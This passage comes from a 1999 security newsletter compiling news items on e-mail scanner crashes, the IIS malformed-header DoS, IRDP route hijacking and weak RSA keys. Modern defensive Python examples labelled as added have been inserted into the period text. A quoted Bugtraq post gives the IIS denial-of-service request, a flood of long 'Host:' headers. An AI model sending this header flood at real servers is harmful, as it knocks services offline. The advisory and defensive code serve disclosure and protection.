CLEAN UP AFTER AN INVASION: Once you rid your PC of its marauder, don't stop there, advises Joe Wells, author of the WildList of viruses. "Read up on what the virus does to files, then take steps to eliminate unpleasant surprises down the road," he says. "For instance, Melissa turns off the dialog box asking if you want to enable macros in Microsoft Word documents, so after disinfecting you'll need to turn that feature back on to remind yourself you have that security option." (In Word 97, select Tools, Options, click General, and check "Macro virus protection"; in Word 2000, select Tools, Macros, Security and choose Medium security.)

Back in Grand Rapids, Shane Toven was about to reformat the hard drives on his devastated computers when he happened upon PowerQuest's Lost & Found data-recovery utility (link below). "I downloaded and installed the demo, and in half an hour, I had recovered all my wiped-out files," reports Toven. Another utility, the free MRecover (link below), can also restore Chernobyl-savaged computers.

Toven got a lucky break. Your best defense: Keep backups of all your vital data. After his near-fatal brush with Chernobyl, Toven changed his modus operandi: "I went out and bought a separate NT server just for backups," he reports. "I also now keep clean, write-protected boot disks for each operating system we use."

Carla Thornton is a contributing editor for PC World. If you're having trouble resolving a PC-related hardware or software problem, we'd like to hear from you.

@HWA

54.0 NEW MAIL ATTACK IDENTIFIED
~~~~~~~~~~~~~~~~~~~~~~~~~~

From http://www.net-security.org/ by Thejian, Thursday 12th August 1999 on 5:00 am CET

Information security consultant R. Rosenberger says he has developed an e-mail-borne attack which can potentially defeat most major network security and anti-virus software products. Instead of slipping in undetected, this attack hits the security software head-on as it tries to scan e-mail attachments.
The flaw is said to be that most security software products are unable to handle "pathological events". The example given is a recursive e-mail attachment (multiple attachments within attachments), which could crash security products trying to scan it and which in turn could take the whole operating system with it, effectively shutting the server down. "I know of products where I can own the box, just by sending an e-mail that nobody receives. I can own the e-mail server, the gateway server -- anything that's part of the e-mail infrastructure," Rosenberger said.

Full story.
http://www.internetnews.com/bus-news/article/0,1087,3_180651,00.html

New Attack on E-mail Infrastructure Identified
August 11, 1999
By Brian McWilliams
InternetNews.com Correspondent

An information security consultant said Wednesday he's discovered a serious flaw in network security and anti-virus software products -- a flaw that could threaten the Internet's e-mail infrastructure.

According to Robert Rosenberger, he's developed an e-mail-borne attack which can potentially defeat most major security products -- not by slipping by undetected, but by attacking the security software head-on as it tries to scan email attachments.

While most security software products can successfully protect themselves against code that tries to disable them, Rosenberger claims they also contain programming errors which render them unable to handle what he calls "pathological events". One example is a recursive e-mail attachment, or multiple attachments within attachments. According to Rosenberger, when security products encounter such specially crafted files at the local or server level, most will crash, and take the operating system with them.

"I know of products where I can own the box, just by sending an e-mail that nobody receives. I can own the e-mail server, the gateway server -- anything that's part of the e-mail infrastructure," Rosenberger said.
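The crash class described above is a parser that recurses until the process dies. The following is an added example, not code from Rosenberger or from any vendor named here, of the defensive shape a mail scanner needs: nesting depth, part count and input size are budgets, checked with an explicit stack, and exhausting any of them yields a verdict instead of a crash. The limits are assumed values and the nested messages are constructed fixtures.

```python
"""Bounded scan of nested e-mail attachments (added example; the limits are assumed values)."""
from email import message_from_bytes
from email.mime.message import MIMEMessage
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText

MAX_BYTES = 1_000_000   # refuse to parse anything larger; this also bounds the (recursive) stdlib parser
MAX_DEPTH = 8           # parts nested deeper than this are rejected, not scanned
MAX_PARTS = 200         # total MIME parts, however they are arranged


def scan_message(raw: bytes, max_depth=MAX_DEPTH, max_parts=MAX_PARTS, max_bytes=MAX_BYTES) -> dict:
    """Walk every MIME part with an explicit stack and stop, with a verdict, as soon
    as any budget is exhausted. Returns {'verdict', 'reason', 'depth', 'parts'[, 'leaves']}."""
    if len(raw) > max_bytes:
        return {"verdict": "reject", "reason": f"{len(raw)} bytes exceeds {max_bytes}",
                "depth": 0, "parts": 0}
    root = message_from_bytes(raw)
    stack = [(root, 0)]            # (part, nesting depth); the outer message is depth 0
    parts, deepest, leaves = 0, 0, []
    while stack:
        part, depth = stack.pop()
        parts += 1
        deepest = max(deepest, depth)
        if depth > max_depth:
            return {"verdict": "reject", "reason": f"nesting depth {depth} exceeds {max_depth}",
                    "depth": deepest, "parts": parts}
        if parts > max_parts:
            return {"verdict": "reject", "reason": f"more than {max_parts} parts",
                    "depth": deepest, "parts": parts}
        if part.is_multipart():
            # multipart/* and message/rfc822 parts both carry a list of sub-parts
            for sub in part.get_payload():
                stack.append((sub, depth + 1))
        else:
            body = part.get_payload(decode=True) or b""
            leaves.append((part.get_content_type(), len(body)))
    return {"verdict": "accept", "reason": "within limits",
            "depth": deepest, "parts": parts, "leaves": leaves}


def build_nested(depth: int) -> bytes:
    """Constructed fixture: one text part wrapped `depth` times, alternating
    multipart/mixed and message/rfc822 (a forwarded mail inside a mail)."""
    part = MIMEText("innermost attachment")
    for level in range(depth):
        if level % 2 == 0:
            wrapper = MIMEMultipart("mixed")
            wrapper.attach(part)
        else:
            wrapper = MIMEMessage(part)
        part = wrapper
    part["Subject"] = f"nested {depth} deep"
    return part.as_bytes()


def build_wide(count: int) -> bytes:
    """Constructed fixture: a single multipart with `count` sibling attachments."""
    msg = MIMEMultipart("mixed")
    for i in range(count):
        msg.attach(MIMEText(f"attachment {i}"))
    msg["Subject"] = f"{count} attachments"
    return msg.as_bytes()


if __name__ == "__main__":
    for raw in (build_nested(3), build_nested(12), build_wide(5), build_wide(300)):
        result = scan_message(raw)
        print(result["verdict"], "-", result["reason"])
```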
Besides consulting to corporations and government agencies, Rosenberger is the author of the Computer Virus Myths Web site which criticizes anti-virus software vendors for whipping up what he calls virus hysteria in an attempt to boost sales.

Rosenberger recently notified Network Associates, Symantec, and several other major antivirus software vendors about his findings and most have promptly responded by upgrading their products to thwart the attack, which he calls the E-mail Infrastructure Security vulnerability. Officials of the firms were not immediately available for comment.

A representative of the Computer Incident Advisory Capability (CIAC) Wednesday said that organization was not aware of Rosenberger's findings. Officials from the Computer Emergency Response Team (CERT) were not immediately available for comment.

While he hasn't publicly released information about his exploit, Rosenberger says others could potentially discover similar flaws. "In about three weeks, every wannabe hacker on the planet is going to know about this and post some kind of sample file, and they're going to be a lot better than mine."

@HWA

55.0 ERROR IN MICROSOFT PATCH
~~~~~~~~~~~~~~~~~~~~~~~~

From http://www.net-security.org/
by Thejian, Thursday 12th August 1999 on 4:30 am CET

On 11 August 1999, Microsoft released a patch for the "Malformed HTTP Request Header" vulnerability. An error has been discovered in that patch. Microsoft has removed the patch from their ftp and are working on correcting the error and expect to re-release the patch in a few days.

MS Advisory.
http://www.microsoft.com/security/bulletins/ms99-029regression.asp

From http://www.securityfocus.com/

NT IIS Malformed HTTP Request Header DoS Vulnerability

Bugtraq ID: 579
Class: Failure to Handle Exceptional Conditions
Remote: Yes
Local: Yes
Published: August 11, 1999
Updated: August 13, 1999

Vulnerable:
Microsoft Commercial Internet System 2.5
Microsoft Commercial Internet System 2.0
Microsoft IIS 4.0
  + Microsoft Windows NT 4.0
  - Microsoft BackOffice 4.5
  - Microsoft Windows NT 4.0
Microsoft Site Server 3.0 Commerce Edition
  - Microsoft Windows NT 4.0
  - Microsoft IIS 4.0
  + Microsoft Windows NT 4.0
  - Microsoft BackOffice 4.5
  - Microsoft Windows NT 4.0
Microsoft Site Server 3.0
  + Microsoft Site Server 3.0 Commerce Edition
  - Microsoft Windows NT 4.0
  - Microsoft IIS 4.0
  + Microsoft Windows NT 4.0
  - Microsoft BackOffice 4.5
  - Microsoft Windows NT 4.0
  + Microsoft Commercial Internet System 2.0
  + Microsoft BackOffice 4.5
  - Microsoft Windows NT 4.0
  + Microsoft BackOffice 4.0
  - Microsoft Windows NT 4.0

Microsoft IIS and all other products that use the IIS web engine have a vulnerability whereby a flood of specially formed HTTP request headers will make IIS consume all available memory on the server and then hang. IIS activity will be halted until the flood ceases or the service is stopped and restarted.

Quoted from Nobuo Miwa's post to Bugtraq:

  Simple play. I sent lots of "Host:aaaaa...aa" to IIS like...

    GET / HTTP/1.1
    Host: aaaaaaaaaaaaaaaaaaaaaaa....(200 bytes)
    Host: aaaaaaaaaaaaaaaaaaaaaaa....(200 bytes)
    ...10,000 lines
    Host: aaaaaaaaaaaaaaaaaaaaaaa....(200 bytes)

  I sent twice above request sets. Then somehow victim IIS got memory leak after these requests. Of course, it can not respond any request any more. If you try this, you should see memory increase through performance monitor. You would see memory increase even after those requests finished already. It will stop when you got shortage of virtual memory.
  After that, you might not be able to restart web service and you would restart computer. I tried this against Japanese and English version of Windows NT.

Microsoft released a patch for this vulnerability on August 11, 1999. However, on August 12, 1999 they retracted it due to an error that made IIS hang whenever the logfile was an exact multiple of 64KB. Microsoft is working to correct this error, and will re-release the patch when it is solved.

Reported to Microsoft by Nobuo Miwa. Microsoft Security Bulletin MS99-029 released August 11, 1999.

advisory: MS99-029: Patch Available for "Malformed HTTP Request Header" Vulnerability (MS)
web page: Frequently Asked Questions: Microsoft Security Bulletin (MS99-029) (Microsoft)
web page: Error in Patch for "Malformed HTTP Request Header" Vulnerability (Microsoft)
message: IIS 4.0 remote DoS (MS99-029) (Nobuo Miwa)

@HWA

56.0 NEW IE5 BUG EXPOSES PASSWORDS
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From http://www.net-security.org/
by Thejian, Thursday 12th August 1999 on 4:00 am CET

Techweb reports the following: "Bug-reporting sites have identified a new security problem with Microsoft's Internet Explorer 5.0 browser. When users access an FTP-protected site and then try to download files, their user name and password can be exposed to snoopers. So far, there are no known cases of any break-ins caused by the glitch."

Techweb.
http://www.techweb.com/wire/story/TWB19990811S0013

@HWA

57.0 KEY TO CRYPTO SUCCESS: DON'T BE BORN IN THE USA
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From http://www.net-security.org/
by Thejian, Thursday 12th August 1999 on 3:20 am CET

Forbes has a story on a new crypto company setting up shop in the States, but which is able to evade the US restrictions on the export of sensitive crypto because their product designers reside in Sweden. Read more on the company and its products here.
http://www.forbes.com/forbes/99/0823/6404078a.htm

Data lock
An encryption firm finds the key to success: not being born in the U.S.A.
By Nikhil Hutheesing

E-COMMERCE will really take off only after we find better ways to keep sensitive personal and corporate data under lock and key. Keeping data secure yet accessible to the right people is harder than you might think. Protegrity, a Swedish firm invading the U.S. market by setting up its headquarters in Stamford, Conn., is making this market its own. One reason it can beat out U.S. competitors in landing business from firms that span the globe: It can run around U.S. export restrictions on encryption software. Since it's a foreign-born business, it can sell abroad without running afoul of U.S. export laws. It ships software from Sweden.

Protegrity's roots go back to 1994, when Ulf Dahl, a business executive who managed a software company in Stockholm, was writing software that would let city governments store personal data--such as marriage certificates and medical histories--while keeping those data separate from citizens' names and inaccessible to snoops. He came across Anonymity Protection, a Swedish startup in Gothenburg that was creating encryption software, and joined it.

Dahl and the engineers at Anonymity devised two programs. One sits on a server and stores the company's security policy, including information on who may access which account files. That information is securely transmitted to all the other servers--perhaps thousands of them--that plug into a company's databases. A second program then encrypts the designated files on the database.

Note that this lock and key is a bit different from what you usually see in a computer network storing sensitive data. Your brokerage firm, for example, often stores your account data and password in unencrypted form on a server. It protects your information by encrypting the transmission of the data across phone lines.
Your password is scrambled as it leaves your modem, thwarting an eavesdropper who might tap into the phone line. But the trading records are stored in plain text. Someone breaking into the broker's database server could get access to them. In the Protegrity system, you encrypt only the specific data you want to keep hidden from snoops while leaving other data accessible to internal users or outsiders tapping in, perhaps, over the Internet. Data can be encrypted at 128 bits or higher (you could need more computers than the Pentagon has to crack the code). Getting hold of data by unauthorized users is tough because a series of events, transparent to the user, have to occur. When you try to gain access to information, Protegrity's system checks to see if you have been included as an authorized user in the gatekeeper. If you pass that, it goes on to double-check that the database that keeps your data is also instructed to let you in. Then it checks a series of rules that determine the information you are allowed to see. Once you pass those steps, and the system sees you are allowed to see the encrypted data, it generates a decryption key that is stored by the gatekeeper in encrypted form. In 1996 Protegrity set up shop above a restaurant overlooking a marina in Stamford. "I realized that to make a success of this product, I would have to go where the market was," explains Dahl. To run the show, the company hired David Morris, who had been an executive vice president at Cylink, a manufacturer of cryptographic products. Although Protegrity had become naturalized, it keeps its product designers in Sweden. The company continues to enjoy its exemption from the U.S. ban on exporting sensitive encryption technology. That ban was meant to prevent hostile nations and criminals from talking in ways that G-men can't understand, yet its effect has been to hand foreign firms a huge advantage in the market for software to encrypt and decrypt sensitive files. 
That software segment could be worth $9 billion in sales over the next five years, says the Economic Strategy Institute. At the end of 1997 there were already 653 encryption products being made in 29 countries outside of the U.S. Unlike Protegrity, American encryption companies have to engage in some fancy footwork to stay legal. "It's like defusing mines--one wrong turn and the mine could explode," says Stewart Baker, a partner in the law firm Steptoe & Johnson in Washington, D.C. For instance, if only two of a firm's engineers, one in the U.S. and one abroad, were to exchange insights about an encryption algorithm, the U.S. government could shut the company down, fine it $1 million and jail its employees. Tiny Protegrity has yet to turn a profit, but that could change. Oracle, IBM and Informix all promote a version of Protegrity's software that works with their databases. Customers are also putting more of their sensitive data on-line. Lucent Technologies, which uses Informix's databases attached to a Protegrity security system, now lets companies that buy wireless equipment log on to its Web site to pull up their account information. Before the switchover a few months ago, customer data had been kept separate, and could be provided only by fax or phone. Roche Holdings' Swedish offices used Protegrity to integrate patient information into its database. Now doctors there can key in the names of their patients, the drugs they take and the side effects. If Roche's database detects a dangerous trend--say, too many patients begin fainting--Roche could quickly notify all the doctors. There is pressure on the government to loosen the U.S. export laws on encryption. But even if that happens, Protegrity and its offshore rivals will have a head start over any U.S. competitors. 
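The model the article describes is worth seeing in working form: a policy held by a gatekeeper, only the designated columns encrypted, and a decryption key released only after the user passes the gatekeeper check, the database check and the column rule. The following is an added illustration and is not Protegrity's code; the policy contents, the HMAC-SHA256 counter-mode keystream used as a stand-in cipher, and the table and column names are assumptions.

```python
"""Selective column encryption behind a policy gatekeeper (added illustration, not Protegrity's code)."""
import hashlib
import hmac
import os

NONCE_LEN = 12


def keystream(key: bytes, nonce: bytes, length: int) -> bytes:
    """Counter-mode keystream derived with HMAC-SHA256. Demonstration only: it gives
    confidentiality for the example but no integrity protection of the ciphertext."""
    out = bytearray()
    counter = 0
    while len(out) < length:
        out += hmac.new(key, nonce + counter.to_bytes(4, "big"), hashlib.sha256).digest()
        counter += 1
    return bytes(out[:length])


def seal(key: bytes, plaintext: bytes) -> bytes:
    nonce = os.urandom(NONCE_LEN)
    return nonce + bytes(p ^ k for p, k in zip(plaintext, keystream(key, nonce, len(plaintext))))


def unseal(key: bytes, blob: bytes) -> bytes:
    nonce, ct = blob[:NONCE_LEN], blob[NONCE_LEN:]
    return bytes(c ^ k for c, k in zip(ct, keystream(key, nonce, len(ct))))


class Gatekeeper:
    """Holds the security policy and the per-column keys (assumed layout).

    policy: {user: {(table, column), ...}} lists the protected columns a user may read.
    Column keys are stored only wrapped under the master key, never in clear."""

    def __init__(self, master_key: bytes, policy: dict):
        self._master = master_key
        self._policy = policy
        self._wrapped = {}  # (table, column) -> column key encrypted under the master key

    def protect_column(self, table: str, column: str) -> None:
        self._wrapped[(table, column)] = seal(self._master, os.urandom(32))

    def is_protected(self, table: str, column: str) -> bool:
        return (table, column) in self._wrapped

    def column_key(self, table: str, column: str) -> bytes:
        # used by the store itself when writing; reads go through release_key()
        return unseal(self._master, self._wrapped[(table, column)])

    def release_key(self, user: str, table: str, column: str, db_acl: set) -> bytes:
        """The three checks the article describes; every one must pass (fail closed)."""
        if user not in self._policy:                      # 1. known to the gatekeeper?
            raise PermissionError(f"{user} is not an authorized user")
        if user not in db_acl:                            # 2. database also admits the user?
            raise PermissionError(f"{user} is not admitted by the database holding {table}")
        if (table, column) not in self._policy[user]:     # 3. rule allows this column?
            raise PermissionError(f"{user} may not read {table}.{column}")
        return self.column_key(table, column)


class RecordStore:
    """Rows are stored with only the designated columns encrypted; the rest stay readable."""

    def __init__(self, gatekeeper: Gatekeeper, table: str, db_acl: set):
        self.gk, self.table, self.db_acl = gatekeeper, table, db_acl
        self.rows = []

    def insert(self, row: dict) -> None:
        stored = {}
        for col, val in row.items():
            if self.gk.is_protected(self.table, col):
                stored[col] = seal(self.gk.column_key(self.table, col), val.encode())
            else:
                stored[col] = val
        self.rows.append(stored)

    def read(self, user: str, index: int, column: str):
        val = self.rows[index][column]
        if not self.gk.is_protected(self.table, column):
            return val                                    # unprotected data needs no key
        key = self.gk.release_key(user, self.table, column, self.db_acl)
        return unseal(key, val).decode()


def demo() -> dict:
    """Constructed scenario: a doctor may read diagnoses, a clerk may not."""
    gk = Gatekeeper(master_key=os.urandom(32),
                    policy={"dr_lind": {("patients", "diagnosis")}, "clerk": set()})
    gk.protect_column("patients", "diagnosis")           # only this column is encrypted
    store = RecordStore(gk, "patients", db_acl={"dr_lind", "clerk"})
    store.insert({"patient_id": "P-1001", "diagnosis": "fainting spells"})
    results = {"doctor": store.read("dr_lind", 0, "diagnosis"),
               "clerk_id": store.read("clerk", 0, "patient_id"),
               "stored_is_ciphertext": store.rows[0]["diagnosis"] != b"fainting spells",
               "clerk_denied": False}
    try:
        store.read("clerk", 0, "diagnosis")
    except PermissionError:
        results["clerk_denied"] = True
    return results


if __name__ == "__main__":
    print(demo())
```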
@HWA

58.0 L0PHT IRDP ADVISORY
~~~~~~~~~~~~~~~~~~~

From http://www.net-security.org/
by Thejian, Thursday 12th August 1999 on 3:40 am CET

"Companies and users of broadband modems beware: Malicious hackers may be "listening" in on your computer's conversation across the Internet." ZDNet picks up on the IRDP advisory released today by L0pht Heavy Industries, a flaw which could allow an unauthorized user to intercept outgoing information, possibly modify unencrypted or lightly encrypted data or deny service to the network.

ZDNet story.

Hackers may be snooping on you
By Robert Lemos, ZDNN
August 11, 1999 5:41 PM PT
URL: http://www.zdnet.com/zdnn/stories/news/0,4586,2313209,00.html

Companies and users of broadband modems beware: Malicious hackers may be "listening" in on your computer's conversation across the Internet.

That's the danger highlighted in a security advisory released on Wednesday by hacker-cum-security specialists L0pht Heavy Industries. The flaw affects Windows 95, 98 and 2000 as well as the SunOS and Solaris 2.6 running a network service known as the ICMP router discovery protocol, or IRDP, that determines the route computers use to connect to the Internet.

The result: An unauthorized user can intercept outgoing information, possibly modify unencrypted or lightly encrypted data, or deny service to the network.

A slight detour for data

Except for the denial of service attack, the malicious programmer needs to be inside the network, stated the advisory. For cable modem users, however, an internal user could be anyone on the local loop -- a neighbor or someone on the next block. Since many cable-modem-based networks use the rerouting technology, users are left open to someone snooping their communications to the Internet.
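IRDP hosts accept ICMP Router Advertisements (type 9) from whoever sends them, which is the whole problem. As an added example that is not L0pht's advisory code, here is the monitoring side: a parser for the advertisement format with checksum and length checks, and detection logic that flags any advertisement that would move a host's default route away from an approved gateway or mark the approved gateway unusable. The approved-router address and the sample packets are constructed.

```python
"""Parse ICMP Router Advertisements (RFC 1256, type 9) and flag ones that would move the
default route. Added example; the approved-router list and the packets are constructed."""
import struct
from ipaddress import IPv4Address

ICMP_ROUTER_ADVERTISEMENT = 9
DO_NOT_USE = -0x80000000                     # RFC 1256: this preference means "never use as default"
APPROVED_ROUTERS = frozenset({"10.0.0.1"})   # assumed: the segment's one legitimate gateway


def icmp_checksum(data: bytes) -> int:
    """RFC 1071 ones'-complement sum of 16-bit words; returns 0 for a packet whose checksum field is valid."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack(f"!{len(data) // 2}H", data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def build_router_advertisement(entries, lifetime=1800) -> bytes:
    """Constructed test fixture: entries is a list of (router_ip, preference) pairs."""
    body = b"".join(struct.pack("!4si", IPv4Address(ip).packed, pref) for ip, pref in entries)
    header = struct.pack("!BBHBBH", ICMP_ROUTER_ADVERTISEMENT, 0, 0, len(entries), 2, lifetime)
    checksum = icmp_checksum(header + body)
    return struct.pack("!BBHBBH", ICMP_ROUTER_ADVERTISEMENT, 0, checksum, len(entries), 2, lifetime) + body


def parse_router_advertisement(pkt: bytes):
    """Return {'lifetime', 'entries'} for a well-formed advertisement, None for any other
    ICMP type, and raise ValueError for a truncated, malformed or corrupted one."""
    if len(pkt) < 8:
        raise ValueError("ICMP header truncated")
    icmp_type, code, _, num_addrs, entry_size, lifetime = struct.unpack("!BBHBBH", pkt[:8])
    if icmp_type != ICMP_ROUTER_ADVERTISEMENT:
        return None
    if icmp_checksum(pkt) != 0:
        raise ValueError("bad ICMP checksum")
    if code != 0 or entry_size != 2 or len(pkt) < 8 + 8 * num_addrs:
        raise ValueError("malformed router advertisement")
    entries = []
    for i in range(num_addrs):
        addr, pref = struct.unpack("!4si", pkt[8 + 8 * i:16 + 8 * i])
        entries.append((str(IPv4Address(addr)), pref))
    return {"lifetime": lifetime, "entries": entries}


def assess_advertisement(adv: dict, approved=APPROVED_ROUTERS) -> dict:
    """Detection logic: which router a host would pick, and every reason that is a problem."""
    alerts = []
    usable = [(pref, ip) for ip, pref in adv["entries"] if pref != DO_NOT_USE]
    preferred = max(usable)[1] if usable else None       # highest preference level wins
    for ip, pref in adv["entries"]:
        if ip not in approved:
            alerts.append(f"unapproved router {ip} advertised with preference {pref}")
        elif pref == DO_NOT_USE:
            alerts.append(f"approved router {ip} advertised as unusable (possible denial of service)")
    if preferred is not None and preferred not in approved:
        alerts.append(f"default route would move to {preferred}")
    return {"preferred": preferred, "alerts": alerts}


if __name__ == "__main__":
    for label, pkt in (("expected", build_router_advertisement([("10.0.0.1", 0)])),
                       ("suspicious", build_router_advertisement(
                           [("10.0.0.1", DO_NOT_USE), ("10.0.0.66", 1000)]))):
        print(label, assess_advertisement(parse_router_advertisement(pkt)))
```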
In essence, another computer on the same network can be used to change the default path that packets take out to the Internet. By placing the address of their own server in the system, an attacker can look at all the outgoing packets of information. While it's a bit of a one-sided conversation -- since incoming packets enter the network normally -- a great deal of information can be gleaned from the outgoing packets, possibly including passwords and credit card numbers.

The most worrisome part of the flaw on Microsoft Windows is that the operating system continues to be vulnerable even when the user believes they have closed the hole. (See the L0pht advisory.)

Some assembly required

In a move long considered controversial, L0pht has decided to release the source code to the basics of a program that could exploit such a hole. However, L0pht did delay the release of the advisory at Microsoft's request, said one L0pht member, known by his handle Space Rogue, in an e-mail.

Microsoft and Sun Microsystems Inc. declined to offer comment while members of L0pht could not be contacted.

@HWA

59.0 Stronger computers, easier encryption, RSA coding
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From http://www.403-security.org/
Astral 12.08.1999

resource section is going to have more than 1000 links till the end of the day

If a new computer design gets built, the keys of banks and other organisations could be an easy target for big companies, because that kind of computer would cost "only" $2 million and that is not so much money for big companies. Adi Shamir helped to develop the new computer and the new encryption design known as RSA. Computer scientists said his work underscores the growing vulnerability of the most commonly used short form of RSA keys, which consists of just 512 bits. The key - a sequence of 1s and 0s, or bits - unlocks the secret coding of a computer transmission so it can be deciphered.
Links:
TechServers
http://www.techserver.com/noframes/story/0,2294,81475-128761-902330-0,00.html

Code-breakers are gaining on cryptography

Copyright © 1999 Nando Media
Copyright © 1999 Associated Press

BY JEFF DONN

WORCESTER, Mass. (August 13, 1999 10:29 a.m. EDT http://www.nandotimes.com) - Computer encryption experts say a new computer design, if built, could crack the secret keys that now protect the bulk of electronic commerce.

The estimated cost of such a computer - $2 million - would be manageable for many organizations. But most highly sensitive military, banking and other data are already protected by stronger keys, according to cryptographers at the conference where the design was shown.

The commonly used weaker keys, though, would become "easy to break for large organizations," said cryptographer Adi Shamir of the Weizmann Institute of Science in Rehovot, Israel. He developed both the new computer design and helped invent the widespread coding system - known as RSA public-key encryption - that it attacks.

Shamir spoke Thursday at the opening of a two-day conference of more than 120 cryptography experts from around the world at Worcester Polytechnic Institute.

Computer scientists said his work underscores the growing vulnerability of the most commonly used short form of RSA keys, which consists of just 512 bits. The key - a sequence of 1s and 0s, or bits - unlocks the secret coding of a computer transmission so it can be deciphered.

Shamir dubs his idea for the computer Twinkle, which stands for The Weizmann Institute Key Locating Engine and also refers to the twinkle of its light emitting diodes. The 6-by-6-inch optical computer would measure the light from diodes to perform mathematical calculations solving 512-bit RSA encryption keys faster than ever - within two or three days. An effort in February to solve shorter, easier 465-bit keys took hundreds of computers and several months.
Shamir first informally showed a prototype of his device at a conference in Prague, the Czech Republic, in May. He publicly outlined its workings at length for the first time Thursday. "Twinkle is a little out there, but it looks like it's buildable to me," said Seth Goldstein, an expert in computer architecture at Pittsburgh's Carnegie Mellon University. Organized crime, friendly and unfriendly governments, research institutions and others might take an interest in such a project, conference participants suggested. In any event, users of 512-bit keys "should be worried," said Christof Paar, a computer engineer at Worcester Polytechnic Institute. "In the current state of the art, it is not secure," added Bob Silverman, a research scientist at Bedford-based RSA Laboratories, a division of RSA Data Security. Shamir co-founded RSA Data but no longer works there. Longer keys, such as 1,024-bit, are already employed for many sensitive communications. But, out of intelligence and other concerns, the U.S. government requires special permission to export software with the longer keys. The most popular browsers are normally set to just 512 bits. Brian Snow, a technical director for information security at the National Security Agency, spoke to the conference Thursday about weak quality assurance in commercial security products. But he declined to answer general questions for the press. Though available, longer keys are harder to set up and take more computer power to operate. Such power may be scarce in the wireless telephones, home appliances and other computerized conveniences of the future, cryptographers said. 
@HWA

60.0 Security police isn't doing enough
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From http://www.403-security.org/
Astral 12.08.1999

meteor rain

Former federal prosecutor Mark Rasch says that while current cybercrime laws are extremely broad and could possibly be interpreted in such a way that makes most Internet users criminals, businesses should still invest heavily in network security.

Links:
ZDNet (Story url not found on ZDNet)

61.0 Hack attacks drive outsourced security
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From ZDNet
http://www.zdnet.com/filters/printerfriendly/0,6061,411335-54,00.html

Hack attacks drive outsourced security
By Jim Kerstetter and John Madden, PC Week
August 8, 1999 9:03 PM PT
URL:

When it comes to implementing network security, even the outsourcers are turning to outsourcing partners.

Internet Security Systems Inc., the company that put network intrusion detection on the map, will announce this month that it is providing managed security services to Internet service providers such as AT&T Corp. and to outsourcing companies such as Electronic Data Systems Corp. ISS has similar partnerships in the works with British Telecommunications plc., MCI WorldCom Advanced Networks and Nippon Telephone & Telegraph Corp., officials said.

Driving this second layer of outsourcing is the complexity of security technology, particularly vulnerability scanning and intrusion detection, along with a shortage of people who can manage such a critical part of a company's network.

"We've actually been doing this ... for some time with a few customers," said Tom Noonan, CEO of ISS, in Atlanta. "It's finally gaining some traction."

It's also likely to gain interest from harried IT administrators at places such as Cornell University's Graduate School of Management.
Two weeks ago, hackers broke into one of the school's Sun Microsystems Inc. servers running a database of statistical research material. The intruder had set up a File Transfer Protocol site on the server, presumably to take out information. "[Intrusion detection] is almost becoming a full-time job--detecting it and then cleaning up after it," said Kevin Baradet, the Ithaca, N.Y., graduate school's network services director. Baradet is looking to purchase intrusion detection software for the graduate school, with 24-by-7 support likely to weigh heavily on his mind, he said. Security outsourcing is not new. IBM Global Services, in Armonk, N.Y., has more than 450 people dedicated to security, including an implementation program for ISS products. Companies such as GTE Internetworking have been hosting security products for years. But now, many more players are jumping into the market. Compaq Computer Corp., for example, has begun a pilot project with ISS to provide intrusion detection. The Houston company's Security Healthcheck service will, for now, be entirely managed by Compaq consultants. It's in pilot testing with several customers and will be in general release by the end of the year, said officials at Compaq's services division in Stow, Mass. In addition, Control Data Systems Inc., of Arden Hills, Mich., last week announced security outsourcing services, including perimeter security, data and resource protection, management and monitoring, and identification and authentication. For ISS, the next step is taking those relationships further. Not only is the company selling the software and training to outsourcing partners, it also is providing a managed service to those companies to ensure they're properly addressing their customers' security needs. The outsourcing partners will set the pricing for the security services; IT managers can expect that upfront costs will be less than buying their own security solutions. 
ISS' RealSecure Network Engine, for example, costs $8,995, a price that doesn't include implementation or paying a trained administrator to monitor it around-the-clock.

Over the coming year, ISS plans to improve the scalability of its vulnerability scanning and intrusion detection products to make them more suitable for outsourced management, Noonan said.

In essence, ISS is offering itself as a manager of the burglar alarms of corporate networks, usually through the outsourcing partner. "There is a need for someone to be the ADT [Security Services Inc.] of the Internet," Noonan said. "And we might as well lay claim to that."

@HWA

62.0 Backdoors in Windows?
~~~~~~~~~~~~~~~~~~~~~

Are there "back doors" in Windows 95 and 98, where hackers on the Internet can get info from your PC?
-- Louis from Seaside Heights

ZDTV

It is possible for hackers to get to your computer if you share hard drives or have a static IP address. At Rootshell (http://www.rootshell.com), ICSA (http://www.icsa.net), and the Computer Emergency Response Team (http://www.cert.org), you can learn about how people do this on Windows 95. These are very useful webpages for security problems. You may also want to check out such newsgroups as comp.risks.

If you use a dial-up connection, your computer's IP address will not stay the same, so hackers will have a hard time locating it. However, computers that use a cable modem or network access with a static IP address are a little bit easier to hack.

You shouldn't be too paranoid, though: Evil hackers are mostly concerned with banks, the Pentagon, and keeping Babylon 5 on the air, not what you have on your personal PC. At any rate, see below for a list of links with information about online security.

Rootshell
http://www.rootshell.com

Computer Emergency Response Team
http://www.cert.org

The US Department of Energy's Computer Incident Advisory Capability
http://ciac.llnl.gov

ICSA
http://www.icsa.net

DigiCrime (it's harmless, we promise!)
http://www.digicrime.com/dc.html

@HWA

63.0 The Newbie's Guide to Fear, Uncertainty, and Doubt
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From Buffer Overflow on HNN
http://www.hackernews.com/

By: Brian Martin

Introduction

Fear, Uncertainty and Doubt (FUD). We all live with it, and we're all accustomed to it at one level or another: "Do I have enough insurance?"; "Did I leave the coffee pot on when I left for work this morning?"; "Will my proposal be accepted by management?" FUD is simply a facet of life; something with which we all must contend to the best of our abilities.

